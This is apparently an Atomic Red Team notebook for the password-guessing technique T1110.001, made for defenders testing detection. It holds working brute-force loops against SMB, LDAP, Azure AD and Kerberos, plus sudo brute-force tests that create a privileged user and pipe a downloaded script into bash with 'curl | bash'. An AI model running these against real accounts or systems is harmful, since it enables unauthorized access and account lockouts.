# T1110.001 - Password Guessing
Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.

Guessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. (Citation: Cylance Cleaver)

Typically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following:

* SSH (22/TCP)
* Telnet (23/TCP)
* FTP (21/TCP)
* NetBIOS / SMB / Samba (139/TCP & 445/TCP)
* LDAP (389/TCP)
* Kerberos (88/TCP)
* RDP / Terminal Services (3389/TCP)
* HTTP/HTTP Management Services (80/TCP & 443/TCP)
* MSSQL (1433/TCP)
* Oracle (1521/TCP)
* MySQL (3306/TCP)
* VNC (5900/TCP)
* SNMP (161/UDP and 162/TCP/UDP)

In addition to management services, adversaries may "target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols," as well as externally facing email applications, such as Office 365.(Citation: US-CERT TA18-068A 2018). Further, adversaries may abuse network device interfaces (such as `wlanAPI`) to brute force accessible wifi-router(s) via wireless authentication protocols.(Citation: Trend Micro Emotet 2020)

In default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows "logon failure" event ID 4625.

## Atomic Tests

### Atomic Test #1 - Brute Force Credentials of single Active Directory domain users via SMBAttempts to brute force a single Active Directory account by testing connectivity to the IPC$ share on a domain controller
**Supported Platforms:** windows#### Attack Commands: Run with `command_prompt`
```command_prompt
echo Password1> passwords.txt
echo 1q2w3e4r>> passwords.txt
echo Password!>> passwords.txt
echo Spring2022>> passwords.txt
echo ChangeMe!>> passwords.txt
@FOR /F "delims=" %p in (passwords.txt) DO @net use %logonserver%\IPC$ /user:"%userdomain%\%username%" "%p" 1>NUL 2>&1 && @echo [*] %username%:%p && @net use /delete %logonserver%\IPC$ > NUL
```

In [ ]:
Invoke-AtomicTest T1110.001 -TestNumbers 1

### Atomic Test #2 - Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)Attempt to brute force Active Directory domain user on a domain controller, via LDAP, with NTLM or Kerberos
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `powershell`
```powershell
if ("NTLM".ToLower() -NotIn @("ntlm","kerberos")) {
  Write-Host "Only 'NTLM' and 'Kerberos' auth methods are supported"
  exit 1
}

[System.Reflection.Assembly]::LoadWithPartialName("System.DirectoryServices.Protocols") | Out-Null
$di = new-object System.DirectoryServices.Protocols.LdapDirectoryIdentifier("$env:UserDnsDomain",389)

$passwordList = Get-Content -Path "PathToAtomicsFolder\T1110.001\src\passwords.txt"
foreach ($password in $passwordList){
  $credz = new-object System.Net.NetworkCredential("$ENV:USERNAME", $password, "$env:UserDnsDomain")
  $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::NTLM)
  try {
    Write-Host " [-] Attempting ${password} on account $ENV:USERNAME."
    $conn.bind()
    # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success
    Write-Host " [!] $ENV:USERNAME:${password} are valid credentials!"
  } catch {
    Write-Host $_.Exception.Message
  }
}
Write-Host "End of bruteforce"
```

In [ ]:
Invoke-AtomicTest T1110.001 -TestNumbers 2

### Atomic Test #3 - Brute Force Credentials of single Azure AD user
Attempt to brute force Azure AD user via AzureAD powershell module.

**Supported Platforms:** azure-ad

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: AzureAD module must be installed.

##### Check Prereq Commands:
```powershell
try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}

```
##### Get Prereq Commands:
```powershell
Install-Module -Name AzureAD -Force

```

In [ ]:
Invoke-AtomicTest T1110.001 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
Import-Module -Name AzureAD

$passwords = "Password1`n1q2w3e4r`nPassword!".split("{`n}")
foreach($password in $passwords) {
  $PWord = ConvertTo-SecureString -String "$password" -AsPlainText -Force
  $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "bruce.wayne@contoso.com", $Pword
  try {
    Write-Host " [-] Attempting ${password} on account bruce.wayne@contoso.com."
    Connect-AzureAD -Credential $Credential 2>&1> $null
    # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success
    Write-Host " [!] bruce.wayne@contoso.com:${password} are valid credentials!`r`n"
    break
  } catch {
    Write-Host " [-] bruce.wayne@contoso.com:${password} invalid credentials.`r`n"
  }
}
Write-Host "End of bruteforce"
```

In [ ]:
Invoke-AtomicTest T1110.001 -TestNumbers 3

### Atomic Test #4 - Password Brute User using Kerbrute Tool
Bruteforce a single user's password from a wordlist

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: kerbrute.exe must exist in PathToAtomicsFolder\..\ExternalPayloads

##### Check Prereq Commands:
```powershell
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe"){exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe"

```
##### Description: bruteuser.txt must exist in PathToAtomicsFolder\..\ExternalPayloads

##### Check Prereq Commands:
```powershell
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\bruteuser.txt"){exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/src/bruteuser.txt?raw=true" -outfile "PathToAtomicsFolder\..\ExternalPayloads\bruteuser.txt"

```

In [ ]:
Invoke-AtomicTest T1110.001 -TestNumbers 4 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe bruteuser --dc $ENV:userdnsdomain -d $ENV:userdomain $env:temp\bruteuser.txt TestUser1 
```

In [ ]:
Invoke-AtomicTest T1110.001 -TestNumbers 4

### Atomic Test #5 - SUDO Brute Force - Debian
An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudo'ers privileges, but they do not know the users password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user. 

This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user

**Supported Platforms:** linux

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `bash`!
##### Description: Check if running on a Debian based machine.

##### Check Prereq Commands:
```bash
if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi
if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi

```
##### Get Prereq Commands:
```bash
apt update && apt install -y openssl sudo curl

```

In [ ]:
Invoke-AtomicTest T1110.001 -TestNumbers 5 -GetPreReqs

#### Attack Commands: Run with `bash`
```bash
useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password123) art
su art
cd /tmp
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh |bash
```

In [ ]:
Invoke-AtomicTest T1110.001 -TestNumbers 5

#### Cleanup: 
```bash
userdel -fr art
```

In [ ]:
Invoke-AtomicTest T1110.001 -TestNumbers 5 -Cleanup

### Atomic Test #6 - SUDO Brute Force - Redhat
An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudo'ers privileges, but they do not know the users password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user. 

This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user

**Supported Platforms:** linux

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `bash`!
##### Description: Check if running on a Redhat based machine.

##### Check Prereq Commands:
```bash
if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "RedHat"; else echo "NOT RedHat"; exit 1; fi
if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi
if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi

```
##### Get Prereq Commands:
```bash
yum update && yum install -y openssl sudo curl

```

In [ ]:
Invoke-AtomicTest T1110.001 -TestNumbers 6 -GetPreReqs

#### Attack Commands: Run with `bash`
```bash
useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password123) art
su art
cd /tmp
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh |bash
```

In [ ]:
Invoke-AtomicTest T1110.001 -TestNumbers 6

#### Cleanup: 
```bash
userdel -fr art
```

In [ ]:
Invoke-AtomicTest T1110.001 -TestNumbers 6 -Cleanup

### Atomic Test #7 - SUDO Brute Force - FreeBSD
An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudo'ers privileges, but they do not know the users password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user. 

This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user

**Supported Platforms:** linux

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `sh`!
##### Description: Check if running on a FreeBSD based machine.

##### Check Prereq Commands:
```bash
if grep -iq "FreeBSD" /etc/os-release; then echo "FreeBSD"; else echo "NOT FreeBSD"; exit 1; fi
if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi
if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
if [ -x "$(command -v bash)" ]; then echo "bash is installed"; else echo "bash is NOT installed"; exit 1; fi

```
##### Get Prereq Commands:
```bash
pkg update && pkg install -y sudo curl bash

```

In [ ]:
Invoke-AtomicTest T1110.001 -TestNumbers 7 -GetPreReqs

#### Attack Commands: Run with `bash`
```bash
pw adduser art -g wheel -s /bin/sh
echo "password123" | pw usermod art -h 0
su art
cd /tmp
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh |bash
```

In [ ]:
Invoke-AtomicTest T1110.001 -TestNumbers 7

#### Cleanup: 
```bash
rmuser -y art
```

In [ ]:
Invoke-AtomicTest T1110.001 -TestNumbers 7 -Cleanup

## Detection
Monitor authentication logs for system and application login failures of [Valid Accounts](https://attack.mitre.org/techniques/T1078). If authentication failures are high, then there may be a brute force attempt to gain access to a system using legitimate credentials.